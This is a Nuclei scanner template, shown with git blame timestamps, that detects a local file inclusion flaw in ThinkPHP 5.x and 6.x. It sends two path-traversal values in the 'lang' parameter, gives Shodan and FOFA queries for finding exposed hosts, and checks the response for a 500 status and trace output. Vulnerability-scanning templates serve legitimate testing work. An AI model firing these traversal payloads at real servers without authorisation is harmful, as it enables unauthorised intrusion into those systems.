nuclei-templates/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml

36 lines
793 B
YAML
Raw Normal View History

2022-12-23 07:25:38 +00:00
id: thinkphp6-lang-lfi
info:
2022-12-23 09:30:52 +00:00
name: Thinkphp Lang - LFI
2022-12-23 07:25:38 +00:00
author: kagamigawa
severity: high
description: |
2022-12-23 09:30:52 +00:00
Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI.
2022-12-23 07:25:38 +00:00
reference:
- https://tttang.com/archive/1865/
metadata:
verified: true
shodan-query: title:"Thinkphp"
fofa-query: header="think_lang"
tags: thinkphp,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?lang=../../thinkphp/base"
- "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Call Stack'
- 'class="trace'
condition: and
- type: status
status:
- 500